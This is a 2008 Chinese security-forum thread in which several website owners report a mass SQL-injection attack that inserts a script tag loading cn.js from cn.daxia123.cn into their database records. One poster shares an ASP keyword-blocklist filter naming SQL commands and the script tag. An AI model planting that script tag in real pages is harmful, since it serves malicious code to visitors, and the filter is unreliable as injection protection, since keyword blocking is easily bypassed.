瑞星卡卡安全论坛技术交流区入侵防御(HIPS) 求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

12345678»   1  /  9  页   跳转

求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

收藏
allenxing
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-04-05
  • 来自:
发表于: 2008-12-26 12:52 | 只看楼主 短消息 资料
字号: 1楼

求助!被http://cn.daxia123.cn/cn.js入侵或者是病毒、攻击

我的网站最近被“<script src=http://cn.daxia123.cn/cn.js></script>”修改了数据,每条信息(如果标题,内容)后面都此信息,并且是修改的数据库。我不知道恶人是能过什么方式修改我网站的数据库。请高手帮忙分析。你可以在google中输入<script src=http://cn.daxia123.cn/cn.js></script>代码,可以发现好多网站同样被做了修改,有的是在原有的图片路径加了此代码,使得图片无法显示,有的是在标题或内容加了此代码。使得面页极为零乱。

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.2; CIBA; 360SE)
最后编辑allenxing 最后编辑于 2008-12-26 21:53:28
分享到:
gototop
 
zg1_2004
头像
禁止访问
  • 帖子:6782
  • 注册: 2004-01-22
  • 来自:
发表于: 2008-12-26 13:15 | 短消息 资料
字号: 2楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

该用户帖子内容已被屏蔽
最后编辑zg1_2004 最后编辑于 2008-12-26 13:17:53
gototop
 
allenxing
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-04-05
  • 来自:
发表于: 2008-12-26 15:29 | 只看楼主 短消息 资料
字号: 3楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

我的网站没有这个功能啊!
gototop
 
daveeyang
头像
初生襁褓狮
  • 帖子:8
  • 注册: 2008-07-28
  • 来自:
发表于: 2008-12-26 16:05 | 短消息 资料
字号: 4楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

我的网站也是碰到这样的问题了,现在也是急得如热锅上的蚂蚁....急呀,正在找解决办法...
gototop
 
daveeyang
头像
初生襁褓狮
  • 帖子:8
  • 注册: 2008-07-28
  • 来自:
发表于: 2008-12-26 16:07 | 短消息 资料
字号: 5楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

继续楼上的回复,木马是这样的:
会定时不定时地修改数据库中的表,在标题部门或者内容部门,加上这一段代码,现在头痛了两天了,不知道是何原因,请高手们赐教!
gototop
 
liberte
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 16:36 | 短消息 资料
字号: 6楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

有什么好的解决方法,我现在只能update数据库了
gototop
 
liberte
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 16:37 | 短消息 资料
字号: 7楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

是有什么漏洞么,还是什么,我的DB是SQL server 2000
gototop
 
idrisky
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 18:43 | 短消息 资料
字号: 8楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵


我也网站也是.....痛苦ING.....
gototop
 
allenxing
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-04-05
  • 来自:
发表于: 2008-12-26 21:48 | 只看楼主 短消息 资料
字号: 9楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

我们已经防止sql注入了,大家没有加的可以加上试试。
代码如下:但我们加的好像并不好使!
<%
dim sql_injdata
SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|daxia123|<script|/script>"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
        For Each SQL_Get In Request.QueryString
                For SQL_Data=0 To Ubound(SQL_inj)
                        if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
                                Response.Write "<Script Language='javascript'>alert('请不要在参数中包含非法字符尝试注入!');history.back(-1)</Script>"
                        Response.end
                        end if
                next
        Next
End If


If Request.Form<>"" Then
        For Each Sql_Post In Request.Form
                For SQL_Data=0 To Ubound(SQL_inj)
                        if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
                                Response.Write "<Script Language='javascript'>alert('请不要在参数中包含非法字符尝试注入!');history.back(-1)</Script>"
                                Response.end
                        end if
                next
        next
end if


%>
最后编辑allenxing 最后编辑于 2008-12-26 22:18:47
gototop
 
bestjia
头像
初生襁褓狮
  • 帖子:6
  • 注册: 2008-12-26
  • 来自:
发表于: 2008-12-26 21:51 | 短消息 资料
字号: 10楼

回复:求助!被http://cn.daxia123.cn/cn.js入侵

看来好多人中招了啊,我的也是,很头痛 一天要UPDATE几次数据库,网站都离不开人了
gototop
 
<<上一主题|下一主题>>
12345678»   1  /  9  页   跳转
页面顶部
Powered by Discuz!NT